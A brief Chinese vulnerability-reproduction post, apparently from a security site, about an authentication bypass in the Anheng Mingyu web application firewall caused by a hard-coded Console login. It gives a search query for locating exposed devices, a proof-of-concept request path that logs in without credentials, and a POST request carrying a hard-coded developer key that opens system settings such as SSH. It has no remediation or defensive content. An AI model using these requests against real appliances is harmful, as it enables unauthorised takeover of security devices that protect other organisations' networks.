安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞

漏洞描述

安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台。

漏洞影响

安恒 明御WEB应用防火墙

网络测绘

app=”安恒信息-明御WAF”

漏洞复现

登录页面

20240313152713812-png (1)

验证POC

/report.m?a=rpc-timed

20240313152820902-1658456645745-b626ae63-660a-4726-ad5d-efd6c4def0ee.6c151b14_2024-03-13_15-27-43 (1)

再访问主页面跳转配置页面

20240313152857488-png (2)

发送请求包配置系统SSH等

POST /system.m?a=reserved
  
key=!@#dbapp-waf-dev-reserved#@!

20240313152937203-png (3)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容